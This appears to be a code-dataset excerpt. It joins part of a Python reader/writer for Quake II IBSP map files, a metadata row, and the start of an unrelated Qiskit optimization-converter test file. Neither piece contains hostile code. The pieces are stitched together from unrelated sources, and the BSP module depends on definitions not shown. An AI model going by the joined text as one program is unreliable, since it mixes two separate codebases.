MONSTER = 0x2000000
DEADMONSTER = 0x4000000
DETAIL = 0x8000000
TRANSLUCENT = 0x10000000
LADDER = 0x20000000
class Leaf:
"""Class for representing a leaf
Attributes:
contents: The content of the leaf. Affect the player's view.
cluster: The cluster containing this leaf. -1 for no visibility info.
area: The area containing this leaf.
bounding_box_min: The minimum coordinate of the bounding box containing
this node.
bounding_box_max: The maximum coordinate of the bounding box containing
this node.
first_leaf_face: The number of the first face in Bsp.faces
number_of_leaf_faces: The number of faces contained within the leaf.
These are stored in consecutive order in Bsp.faces at
Leaf.first_leaf_face.
first_leaf_brush: The number of the first brush in Bsp.brushes
number_of_leaf_brushes: The number of brushes contained within the
leaf. These are stored in consecutive order in Bsp.brushes at
Leaf.first_leaf_brush.
"""
format = '<i8h4H'
size = struct.calcsize(format)
__slots__ = (
'contents',
'cluster',
'area',
'bounding_box_min',
'bounding_box_max',
'first_leaf_face',
'number_of_leaf_faces',
'first_leaf_brush',
'number_of_leaf_brushes'
)
def __init__(self,
contents,
cluster,
area,
bounding_box_min_x,
bounding_box_min_y,
bounding_box_min_z,
bounding_box_max_x,
bounding_box_max_y,
bounding_box_max_z,
first_leaf_face,
number_of_leaf_faces,
first_leaf_brush,
number_of_leaf_brushes):
self.contents = contents
self.cluster = cluster
self.area = area
self.bounding_box_min = bounding_box_min_x, bounding_box_min_y, bounding_box_min_z
self.bounding_box_max = bounding_box_max_x, bounding_box_max_y, bounding_box_max_z
self.first_leaf_face = first_leaf_face
self.number_of_leaf_faces = number_of_leaf_faces
self.first_leaf_brush = first_leaf_brush
self.number_of_leaf_brushes = number_of_leaf_brushes
@classmethod
def write(cls, file, leaf):
leaf_data = struct.pack(cls.format,
leaf.contents,
leaf.cluster,
leaf.area,
*leaf.bounding_box_min,
*leaf.bounding_box_max,
leaf.first_leaf_face,
leaf.number_of_leaf_faces,
leaf.first_leaf_brush,
leaf.number_of_leaf_brushes)
file.write(leaf_data)
@classmethod
def read(cls, file):
leaf_data = file.read(cls.size)
leaf_struct = struct.unpack(cls.format, leaf_data)
return Leaf(*leaf_struct)
class Leafs(ClassSequence):
Class = Leaf
class LeafFaces:
@classmethod
def write(cls, file, leaf_faces):
leaf_faces_format = '<{}H'.format(len(leaf_faces))
leaf_faces_data = struct.pack(leaf_faces_format, *leaf_faces)
file.write(leaf_faces_data)
@classmethod
def read(cls, file):
return [lf[0] for lf in struct.iter_unpack('<H', file.read())]
class LeafBrushes:
@classmethod
def write(cls, file, leaf_brushes):
leaf_brushes_format = '<{}H'.format(len(leaf_brushes))
leaf_brushes_data = struct.pack(leaf_brushes_format, *leaf_brushes)
file.write(leaf_brushes_data)
@classmethod
def read(cls, file):
return [lb[0] for lb in struct.iter_unpack('<H', file.read())]
class Edge:
"""Class for representing a edge
Attributes:
vertexes: A two-tuple of vertexes that form the edge. Vertex 0 is the
start vertex, and 1 is the end vertex.
"""
format = '<2H'
size = struct.calcsize(format)
__slots__ = (
'vertexes'
)
def __init__(self, vertex_0, vertex_1):
self.vertexes = vertex_0, vertex_1
def __getitem__(self, item):
if item > 1:
raise IndexError('list index of out of range')
return self.vertexes[item]
@classmethod
def write(cls, file, edge):
edge_data = struct.pack(cls.format,
*edge.vertexes)
file.write(edge_data)
@classmethod
def read(cls, file):
edge_data = file.read(cls.size)
edge_struct = struct.unpack(cls.format, edge_data)
return Edge(*edge_struct)
class Edges(ClassSequence):
Class = Edge
class SurfEdges:
@classmethod
def write(cls, file, surf_edges):
surf_edges_format = '<{}H'.format(len(surf_edges))
surf_edges_data = struct.pack(surf_edges_format, *surf_edges)
file.write(surf_edges_data)
@classmethod
def read(cls, file):
return [se[0] for se in struct.iter_unpack('<H', file.read())]
class Model:
"""Class for representing a model
Attributes:
bounding_box_min: The minimum coordinate of the bounding box containing
the model.
bounding_box_max: The maximum coordinate of the bounding box containing
the model.
origin: The origin of the model.
head_node: A four-tuple of indexes. Corresponds to number of map hulls.
visleafs: The number of leaves in the bsp tree?
first_face: The number of the first face in Bsp.mark_surfaces.
number_of_faces: The number of faces contained in the node. These
are stored in consecutive order in Bsp.mark_surfaces starting at
Model.first_face.
"""
format = '<9f3i'
size = struct.calcsize(format)
__slots__ = (
'bounding_box_min',
'bounding_box_max',
'origin',
'head_node',
'first_face',
'number_of_faces'
)
def __init__(self,
bounding_box_min_x,
bounding_box_min_y,
bounding_box_min_z,
bounding_box_max_x,
bounding_box_max_y,
bounding_box_max_z,
origin_x,
origin_y,
origin_z,
head_node,
first_face,
number_of_faces):
self.bounding_box_min = bounding_box_min_x, bounding_box_min_y, bounding_box_min_z
self.bounding_box_max = bounding_box_max_x, bounding_box_max_y, bounding_box_max_z
self.origin = origin_x, origin_y, origin_z
self.head_node = head_node
self.first_face = first_face
self.number_of_faces = number_of_faces
@classmethod
def write(cls, file, model):
model_data = struct.pack(cls.format,
*model.bounding_box_min,
*model.bounding_box_max,
*model.origin,
model.head_node,
model.first_face,
model.number_of_faces)
file.write(model_data)
@classmethod
def read(cls, file):
model_data = file.read(cls.size)
model_struct = struct.unpack(cls.format, model_data)
return Model(*model_struct)
class Models(ClassSequence):
Class = Model
class Brush:
format = '<3i'
size = struct.calcsize(format)
__slots__ = (
'first_side',
'number_of_sides',
'contents'
)
def __init__(self,
first_side,
number_of_sides,
contents):
self.first_side = first_side
self.number_of_sides = number_of_sides
self.contents = contents
@classmethod
def write(cls, file, brush):
brush_data = struct.pack(cls.format,
brush.first_side,
brush.number_of_sides,
brush.contents)
file.write(brush_data)
@classmethod
def read(cls, file):
brush_data = file.read(cls.size)
brush_struct = struct.unpack(cls.format, brush_data)
return Brush(*brush_struct)
class Brushes(ClassSequence):
Class = Brush
class BrushSide:
format = '<Hh'
size = struct.calcsize(format)
__slots__ = (
'plane_number',
'texture_info'
)
def __init__(self,
plane_number,
texture_info):
self.plane_number = plane_number
self.texture_info = texture_info
@classmethod
def write(cls, file, brush_side):
brush_side_data = struct.pack(cls.format,
brush_side.plane_number,
brush_side.texture_info)
file.write(brush_side_data)
@classmethod
def read(cls, file):
brush_side_data = file.read(cls.size)
brush_side_struct = struct.unpack(cls.format, brush_side_data)
return BrushSide(*brush_side_struct)
class BrushSides(ClassSequence):
Class = BrushSide
class Pop:
@classmethod
def write(cls, file, structures):
file.write(structures)
@classmethod
def read(cls, file):
return file.read()
class Area:
format = '<2i'
size = struct.calcsize(format)
__slots__ = (
'number_of_area_portals',
'first_area_portal'
)
def __init__(self,
number_of_area_portals,
first_area_portal):
self.number_of_area_portals = number_of_area_portals
self.first_area_portal = first_area_portal
@classmethod
def write(cls, file, area):
area_data = struct.pack(cls.format,
area.number_of_area_portals,
area.first_area_portal)
file.write(area_data)
@classmethod
def read(cls, file):
area_data = file.read(cls.size)
area_struct = struct.unpack(cls.format, area_data)
return Area(*area_struct)
class Areas(ClassSequence):
Class = Area
class AreaPortal:
format = '<2i'
size = struct.calcsize(format)
__slots__ = (
'portal_number',
'other_area'
)
def __init__(self,
portal_number,
other_area):
self.portal_number = portal_number
self.other_area = other_area
@classmethod
def write(cls, file, area):
area_data = struct.pack(cls.format,
area.portal_number,
area.other_area)
file.write(area_data)
@classmethod
def read(cls, file):
area_data = file.read(cls.size)
area_struct = struct.unpack(cls.format, area_data)
return AreaPortal(*area_struct)
class AreaPortals(ClassSequence):
Class = AreaPortal
class Lump:
"""Class for representing a lump.
A lump is a section of data that typically contains a sequence of data
structures.
Attributes:
offset: The offset of the lump entry from the start of the file.
length: The length of the lump entry.
"""
format = '<2i'
size = struct.calcsize(format)
__slots__ = (
'offset',
'length'
)
def __init__(self, offset, length):
self.offset = offset
self.length = length
@classmethod
def write(cls, file, lump):
lump_data = struct.pack(cls.format,
lump.offset,
lump.length)
file.write(lump_data)
@classmethod
def read(cls, file):
lump_data = file.read(cls.size)
lump_struct = struct.unpack(cls.format, lump_data)
return Lump(*lump_struct)
class Header:
"""Class for representing a Bsp file header
Attributes:
identity: The file identity. Should be b'IBSP'.
version: The file version. Should be 38.
lumps: A sequence of nineteen Lumps
"""
format = '<4si{}'.format(Lump.format[1:] * 19)
size = struct.calcsize(format)
order = [
Entities,
Planes,
Vertexes,
Visibilities,
Nodes,
TextureInfos,
Faces,
Lighting,
Leafs,
LeafFaces,
LeafBrushes,
Edges,
SurfEdges,
Models,
Brushes,
BrushSides,
Pop,
Areas,
AreaPortals
]
__slots__ = (
'identity',
'version',
'lumps'
)
def __init__(self,
identity,
version,
lumps):
self.identity = identity
self.version = version
self.lumps = lumps
@classmethod
def write(cls, file, header):
lump_values = []
for lump in header.lumps:
lump_values += lump.offset, lump.length
header_data = struct.pack(cls.format,
header.identity,
header.version,
*lump_values)
file.write(header_data)
@classmethod
def read(cls, file):
data = file.read(cls.size)
lumps_start = struct.calcsize('<4si')
header_data = data[:lumps_start]
header_struct = struct.unpack('<4si', header_data)
ident = header_struct[0]
version = header_struct[1]
lumps_data = data[lumps_start:]
lumps = [Lump(*l) for l in struct.iter_unpack(Lump.format, lumps_data)]
return Header(ident, version, lumps)
class Bsp:
"""Class for working with Bsp files
Example:
b = Bsp.open(file)
Attributes:
identity: Identity of the Bsp file. Should be b'IBSP'
version: Version of the Bsp file. Should be 38
entities: A string containing the entity definitions.
planes: A list of Plane objects used by the bsp tree data structure.
vertexes: A list of Vertex objects.
visibilities: A list of integers representing visibility data.
nodes: A list of Node objects used by the bsp tree data structure.
texture_infos: A list of TextureInfo objects.
faces: A list of Face objects.
lighting: A list of ints representing lighting data.
leafs: A list of Leaf objects used by the bsp tree data structure.
leaf_faces: A list of ints representing a consecutive list of faces
used by the Leaf objects.
leaf_brushes: A list of ints representing a consecutive list of edges
used by the Leaf objects.
edges: A list of Edge objects.
surf_edges: A list of ints representing a consecutive list of edges
used by the Face objects.
models: A list of Model objects.
brushes: A list of Brush objects.
brush_sides: A list of BrushSide objects.
pop: Proof of purchase? Always 256 bytes of null data if present.
areas: A list of Area objects.
area_portals: A list of AreaPortal objects.
"""
def __init__(self):
self.fp = None
self.mode = None
self._did_modify = False
self.identity = b'IBSP'
self.version = 38
self.entities = ""
self.planes = []
self.vertexes = []
self.visibilities = []
self.nodes = []
self.texture_infos = []
self.faces = []
self.lighting = b''
self.leafs = []
self.leaf_faces = []
self.leaf_brushes = []
self.edges = []
self.surf_edges = []
self.models = []
self.brushes = []
self.brush_sides = []
self.pop = []
self.areas = []
self.area_portals = []
Lump = Lump
Header = Header
Entities = Entities
Planes = Planes
Vertexes = Vertexes
Visibilities = Visibilities
Visibilities = Visibilities
Nodes = Nodes
TextureInfos = TextureInfos
Faces = Faces
Lighting = Lighting
Leafs = Leafs
LeafFaces = LeafFaces
LeafBrushes = LeafBrushes
Edges = Edges
SurfEdges = SurfEdges
Models = Models
Brushes = Brushes
BrushSides = BrushSides
Pop = Pop
Areas = Areas
AreaPortals = AreaPortals
@classmethod
def open(cls, file, mode='r'):
"""Returns a Bsp object
Args:
file: Either the path to the file, a file-like object, or bytes.
mode: An optional string that indicates which mode to open the file
Returns:
An Bsp object constructed from the information read from the
file-like object.
Raises:
ValueError: If an invalid file mode is given.
RuntimeError: If the file argument is not a file-like object.
"""
if mode not in ('r', 'w', 'a'):
raise ValueError("invalid mode: '%s'" % mode)
filemode = {'r': 'rb', 'w': 'w+b', 'a': 'r+b'}[mode]
if isinstance(file, str):
file = io.open(file, filemode)
elif isinstance(file, bytes):
file = io.BytesIO(file)
elif not hasattr(file, 'read'):
raise RuntimeError(
"Bsp.open() requires 'file' to be a path, a file-like object, "
"or bytes")
# Read
if mode == 'r':
return cls._read_file(file, mode)
# Write
elif mode == 'w':
bsp = cls()
bsp.fp = file
bsp.mode = 'w'
bsp._did_modify = True
return bsp
# Append
else:
bsp = cls._read_file(file, mode)
bsp._did_modify = True
return bsp
@classmethod
def _read_file(cls, file, mode):
def _read_lump(Class):
lump = header.lumps[header.order.index(Class)]
file.seek(lump.offset)
return Class.read(io.BytesIO(file.read(lump.length)))
bsp = cls()
bsp.mode = mode
bsp.fp = file
# Header
header = cls.Header.read(file)
bsp.identity = header.identity
bsp.version = header.version
bsp.entities = _read_lump(cls.Entities)
bsp.planes = _read_lump(cls.Planes)
bsp.vertexes = _read_lump(cls.Vertexes)
bsp.visibilities = _read_lump(cls.Visibilities)
bsp.nodes = _read_lump(cls.Nodes)
bsp.texture_infos = _read_lump(cls.TextureInfos)
bsp.faces = _read_lump(cls.Faces)
bsp.lighting = _read_lump(cls.Lighting)
bsp.leafs = _read_lump(cls.Leafs)
bsp.leaf_faces = _read_lump(cls.LeafFaces)
bsp.leaf_brushes = _read_lump(cls.LeafBrushes)
bsp.edges = _read_lump(cls.Edges)
bsp.surf_edges = _read_lump(cls.SurfEdges)
bsp.models = _read_lump(cls.Models)
bsp.brushes = _read_lump(cls.Brushes)
bsp.brush_sides = _read_lump(cls.BrushSides)
bsp.pop = _read_lump(cls.Pop)
bsp.areas = _read_lump(cls.Areas)
bsp.area_portals = _read_lump(cls.AreaPortals)
return bsp
@classmethod
def _write_file(cls, file, bsp):
def _write_lump(Class, data):
offset = file.tell()
Class.write(file, data)
size = file.tell() - offset
return cls.Lump(offset, size)
lumps = [cls.Lump(0, 0) for _ in range(19)]
header = cls.Header(bsp.identity, bsp.version, lumps)
lump_index = header.order.index
# Stub out header info
cls.Header.write(file, header)
lumps[lump_index(cls.Entities)] = _write_lump(cls.Entities, bsp.entities)
lumps[lump_index(cls.Planes)] = _write_lump(cls.Planes, bsp.planes)
lumps[lump_index(cls.Vertexes)] = _write_lump(cls.Vertexes, bsp.vertexes)
lumps[lump_index(cls.Visibilities)] = _write_lump(cls.Visibilities, bsp.visibilities)
lumps[lump_index(cls.Nodes)] = _write_lump(cls.Nodes, bsp.nodes)
lumps[lump_index(cls.TextureInfos)] = _write_lump(cls.TextureInfos, bsp.texture_infos)
lumps[lump_index(cls.Faces)] = _write_lump(cls.Faces, bsp.faces)
lumps[lump_index(cls.Lighting)] = _write_lump(cls.Lighting, bsp.lighting)
lumps[lump_index(cls.Leafs)] = _write_lump(cls.Leafs, bsp.leafs)
lumps[lump_index(cls.LeafFaces)] = _write_lump(cls.LeafFaces, bsp.leaf_faces)
lumps[lump_index(cls.LeafBrushes)] = _write_lump(cls.LeafBrushes, bsp.leaf_brushes)
lumps[lump_index(cls.Edges)] = _write_lump(cls.Edges, bsp.edges)
lumps[lump_index(cls.SurfEdges)] = _write_lump(cls.SurfEdges, bsp.surf_edges)
lumps[lump_index(cls.Models)] = _write_lump(cls.Models, bsp.models)
lumps[lump_index(cls.Brushes)] = _write_lump(cls.Brushes, bsp.brushes)
lumps[lump_index(cls.BrushSides)] = _write_lump(cls.BrushSides, bsp.brush_sides)
lumps[lump_index(cls.Pop)] = _write_lump(cls.Pop, bsp.pop)
lumps[lump_index(cls.Areas)] = _write_lump(cls.Areas, bsp.areas)
lumps[lump_index(cls.AreaPortals)] = _write_lump(cls.AreaPortals, bsp.area_portals)
end_of_file = file.tell()
# Finalize header
file.seek(0)
cls.Header.write(file, header)
file.seek(end_of_file)
def save(self, file):
"""Writes Bsp data to file
Args:
file: Either the path to the file, or a file-like object, or bytes.
Raises:
RuntimeError: If the file argument is not a file-like object.
"""
should_close = False
if isinstance(file, str):
file = io.open(file, 'r+b')
should_close = True
elif isinstance(file, bytes):
file = io.BytesIO(file)
should_close = True
elif not hasattr(file, 'write'):
raise RuntimeError(
"Bsp.open() requires 'file' to be a path, a file-like object, "
"or bytes")
self._write_file(file, self)
if should_close:
file.close()
def __enter__(self):
return self
def __exit__(self, type, value, traceback):
self.close()
def close(self):
"""Closes the file pointer if possible. If mode is 'w' or 'a', the file
will be written to.
"""
if self.fp:
if self.mode in ('w', 'a') and self._did_modify:
self.fp.seek(0)
self._write_file(self.fp, self)
self.fp.truncate()
file_object = self.fp
self.fp = None
file_object.close()
| [
"[email protected]"
] | |
55a4e8e8c4aa91e9545e39a617b5c10879c37d07 | 33eb4fd807c1a641f52f7124ec7b256ce07612f1 | /test/optimization/test_converters.py | ceb47854904a2313fb0dfe0c2ea5d0555a45b620 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | levbishop/qiskit-aqua | 9ee27da1533cbb9746fe5ff5255533bd9742faa5 | 50e4d935241452bb76296cea6144a9fc452c5e2c | refs/heads/master | 2022-12-04T01:48:18.477406 | 2020-08-11T19:25:03 | 2020-08-11T19:25:03 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 30,877 | py | # -*- coding: utf-8 -*-
# This code is part of Qiskit.
#
# (C) Copyright IBM 2020.
#
# This code is licensed under the Apache License, Version 2.0. You may
# obtain a copy of this license in the LICENSE.txt file in the root directory
# of this source tree or at http://www.apache.org/licenses/LICENSE-2.0.
#
# Any modifications or derivative works of this code must retain this
# copyright notice, and modified files need to carry a notice indicating
# that they have been altered from the originals.
""" Test Converters """
import logging
import unittest
from test.optimization.optimization_test_case import QiskitOptimizationTestCase
import numpy as np
from docplex.mp.model import Model
from qiskit.aqua.algorithms import NumPyMinimumEigensolver
from qiskit.aqua.operators import Z, I
from qiskit.optimization import QuadraticProgram, QiskitOptimizationError
from qiskit.optimization.algorithms import MinimumEigenOptimizer, CplexOptimizer, ADMMOptimizer
from qiskit.optimization.algorithms import OptimizationResult
from qiskit.optimization.algorithms.admm_optimizer import ADMMParameters
from qiskit.optimization.algorithms.optimization_algorithm import OptimizationResultStatus
from qiskit.optimization.converters import (InequalityToEquality, IntegerToBinary,
LinearEqualityToPenalty, QuadraticProgramToIsing,
IsingToQuadraticProgram)
from qiskit.optimization.problems import Constraint, Variable
logger = logging.getLogger(__name__)
QUBIT_OP_MAXIMIZE_SAMPLE = (
-199999.5 * (I ^ I ^ I ^ Z)
+ -399999.5 * (I ^ I ^ Z ^ I)
+ -599999.5 * (I ^ Z ^ I ^ I)
+ -799999.5 * (Z ^ I ^ I ^ I)
+ 100000 * (I ^ I ^ Z ^ Z)
+ 150000 * (I ^ Z ^ I ^ Z)
+ 300000 * (I ^ Z ^ Z ^ I)
+ 200000 * (Z ^ I ^ I ^ Z)
+ 400000 * (Z ^ I ^ Z ^ I)
+ 600000 * (Z ^ Z ^ I ^ I)
)
OFFSET_MAXIMIZE_SAMPLE = 1149998
class TestConverters(QiskitOptimizationTestCase):
"""Test Converters"""
def test_empty_problem(self):
""" Test empty problem """
op = QuadraticProgram()
conv = InequalityToEquality()
op = conv.convert(op)
conv = IntegerToBinary()
op = conv.convert(op)
conv = LinearEqualityToPenalty()
op = conv.convert(op)
_, shift = op.to_ising()
self.assertEqual(shift, 0.0)
def test_valid_variable_type(self):
"""Validate the types of the variables for QuadraticProgram.to_ising."""
# Integer variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.integer_var(0, 10, "int_var")
_ = op.to_ising()
# Continuous variable
with self.assertRaises(QiskitOptimizationError):
op = QuadraticProgram()
op.continuous_var(0, 10, "continuous_var")
_ = op.to_ising()
def test_inequality_binary(self):
""" Test InequalityToEqualityConverter with binary variables """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
# Quadratic constraints
quadratic = {('x0', 'x1'): 1, ('x1', 'x2'): 2}
op.quadratic_constraint({}, quadratic, Constraint.Sense.LE, 3, 'x0x1_x1x2LE')
quadratic = {('x0', 'x1'): 3, ('x1', 'x2'): 4}
op.quadratic_constraint({}, quadratic, Constraint.Sense.GE, 3, 'x0x1_x1x2GE')
# Convert inequality constraints into equality constraints
conv = InequalityToEquality()
op2 = conv.convert(op)
self.assertListEqual([v.name for v in op2.variables],
['x0', 'x1', 'x2', 'x1x2@int_slack', 'x0x2@int_slack',
'x0x1_x1x2LE@int_slack', 'x0x1_x1x2GE@int_slack'])
# Check names and objective senses
self.assertEqual(op.name, op2.name)
self.assertEqual(op.objective.sense, op2.objective.sense)
# For linear constraints
lst = [
op2.linear_constraints[0].linear.to_dict()[0],
op2.linear_constraints[0].linear.to_dict()[1],
]
self.assertListEqual(lst, [1, 1])
self.assertEqual(op2.linear_constraints[0].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[1].linear.to_dict()[1],
op2.linear_constraints[1].linear.to_dict()[2],
op2.linear_constraints[1].linear.to_dict()[3],
]
self.assertListEqual(lst, [1, -1, 1])
lst = [op2.variables[3].lowerbound, op2.variables[3].upperbound]
self.assertListEqual(lst, [0, 3])
self.assertEqual(op2.linear_constraints[1].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[2].linear.to_dict()[0],
op2.linear_constraints[2].linear.to_dict()[2],
op2.linear_constraints[2].linear.to_dict()[4],
]
self.assertListEqual(lst, [1, 3, -1])
lst = [op2.variables[4].lowerbound, op2.variables[4].upperbound]
self.assertListEqual(lst, [0, 2])
self.assertEqual(op2.linear_constraints[2].sense, Constraint.Sense.EQ)
# For quadratic constraints
lst = [
op2.quadratic_constraints[0].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[0].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[0].linear.to_dict()[5],
]
self.assertListEqual(lst, [1, 2, 1])
lst = [op2.variables[5].lowerbound, op2.variables[5].upperbound]
self.assertListEqual(lst, [0, 3])
lst = [
op2.quadratic_constraints[1].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[1].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[1].linear.to_dict()[6],
]
self.assertListEqual(lst, [3, 4, -1])
lst = [op2.variables[6].lowerbound, op2.variables[6].upperbound]
self.assertListEqual(lst, [0, 4])
result = OptimizationResult(x=np.arange(7), fval=0, variables=op2.variables)
new_result = conv.interpret(result)
np.testing.assert_array_almost_equal(new_result.x, np.arange(3))
self.assertListEqual(new_result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(new_result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 2})
def test_inequality_integer(self):
""" Test InequalityToEqualityConverter with integer variables """
op = QuadraticProgram()
for i in range(3):
op.integer_var(name='x{}'.format(i), lowerbound=-3, upperbound=3)
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
# Quadratic constraints
quadratic = {('x0', 'x1'): 1, ('x1', 'x2'): 2}
op.quadratic_constraint({}, quadratic, Constraint.Sense.LE, 3, 'x0x1_x1x2LE')
quadratic = {('x0', 'x1'): 3, ('x1', 'x2'): 4}
op.quadratic_constraint({}, quadratic, Constraint.Sense.GE, 3, 'x0x1_x1x2GE')
conv = InequalityToEquality()
op2 = conv.convert(op)
self.assertListEqual([v.name for v in op2.variables],
['x0', 'x1', 'x2', 'x1x2@int_slack', 'x0x2@int_slack',
'x0x1_x1x2LE@int_slack', 'x0x1_x1x2GE@int_slack'])
# For linear constraints
lst = [
op2.linear_constraints[0].linear.to_dict()[0],
op2.linear_constraints[0].linear.to_dict()[1],
]
self.assertListEqual(lst, [1, 1])
self.assertEqual(op2.linear_constraints[0].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[1].linear.to_dict()[1],
op2.linear_constraints[1].linear.to_dict()[2],
op2.linear_constraints[1].linear.to_dict()[3],
]
self.assertListEqual(lst, [1, -1, 1])
lst = [op2.variables[3].lowerbound, op2.variables[3].upperbound]
self.assertListEqual(lst, [0, 8])
self.assertEqual(op2.linear_constraints[1].sense, Constraint.Sense.EQ)
lst = [
op2.linear_constraints[2].linear.to_dict()[0],
op2.linear_constraints[2].linear.to_dict()[2],
op2.linear_constraints[2].linear.to_dict()[4],
]
self.assertListEqual(lst, [1, 3, -1])
lst = [op2.variables[4].lowerbound, op2.variables[4].upperbound]
self.assertListEqual(lst, [0, 10])
self.assertEqual(op2.linear_constraints[2].sense, Constraint.Sense.EQ)
# For quadratic constraints
lst = [
op2.quadratic_constraints[0].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[0].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[0].linear.to_dict()[5],
]
self.assertListEqual(lst, [1, 2, 1])
lst = [op2.variables[5].lowerbound, op2.variables[5].upperbound]
self.assertListEqual(lst, [0, 30])
lst = [
op2.quadratic_constraints[1].quadratic.to_dict()[(0, 1)],
op2.quadratic_constraints[1].quadratic.to_dict()[(1, 2)],
op2.quadratic_constraints[1].linear.to_dict()[6],
]
self.assertListEqual(lst, [3, 4, -1])
lst = [op2.variables[6].lowerbound, op2.variables[6].upperbound]
self.assertListEqual(lst, [0, 60])
result = OptimizationResult(x=np.arange(7), fval=0, variables=op2.variables)
new_result = conv.interpret(result)
np.testing.assert_array_almost_equal(new_result.x, np.arange(3))
self.assertListEqual(new_result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(new_result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 2})
def test_inequality_mode_integer(self):
""" Test integer mode of InequalityToEqualityConverter() """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
conv = InequalityToEquality(mode='integer')
op2 = conv.convert(op)
lst = [op2.variables[3].vartype, op2.variables[4].vartype]
self.assertListEqual(lst, [Variable.Type.INTEGER, Variable.Type.INTEGER])
def test_inequality_mode_continuous(self):
""" Test continuous mode of InequalityToEqualityConverter() """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
conv = InequalityToEquality(mode='continuous')
op2 = conv.convert(op)
lst = [op2.variables[3].vartype, op2.variables[4].vartype]
self.assertListEqual(lst, [Variable.Type.CONTINUOUS, Variable.Type.CONTINUOUS])
def test_inequality_mode_auto(self):
""" Test auto mode of InequalityToEqualityConverter() """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1.1, 'x2': 2.2}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 3.3, 'x0x2')
conv = InequalityToEquality(mode='auto')
op2 = conv.convert(op)
lst = [op2.variables[3].vartype, op2.variables[4].vartype]
self.assertListEqual(lst, [Variable.Type.INTEGER, Variable.Type.CONTINUOUS])
def test_penalize_sense(self):
""" Test PenalizeLinearEqualityConstraints with senses """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.LE, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.GE, 2, 'x0x2')
self.assertEqual(op.get_num_linear_constraints(), 3)
conv = LinearEqualityToPenalty()
with self.assertRaises(QiskitOptimizationError):
conv.convert(op)
def test_penalize_binary(self):
""" Test PenalizeLinearEqualityConstraints with binary variables """
op = QuadraticProgram()
for i in range(3):
op.binary_var(name='x{}'.format(i))
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 1, 'x0x1')
linear_constraint = {'x1': 1, 'x2': -1}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 2, 'x1x2')
linear_constraint = {'x0': 1, 'x2': 3}
op.linear_constraint(linear_constraint, Constraint.Sense.EQ, 2, 'x0x2')
self.assertEqual(op.get_num_linear_constraints(), 3)
conv = LinearEqualityToPenalty()
op2 = conv.convert(op)
self.assertEqual(op2.get_num_linear_constraints(), 0)
result = OptimizationResult(x=np.arange(3), fval=0, variables=op2.variables)
new_result = conv.interpret(result)
self.assertEqual(new_result.status, OptimizationResultStatus.INFEASIBLE)
np.testing.assert_array_almost_equal(new_result.x, np.arange(3))
self.assertListEqual(result.variable_names, ['x0', 'x1', 'x2'])
self.assertDictEqual(result.variables_dict, {'x0': 0, 'x1': 1, 'x2': 2})
def test_penalize_integer(self):
""" Test PenalizeLinearEqualityConstraints with integer variables """
op = QuadraticProgram()
for i in range(3):
op.integer_var(name='x{}'.format(i), lowerbound=-3, upperbound=3)
# Linear constraints
linear_constraint = {'x0': 1, 'x1': 1}
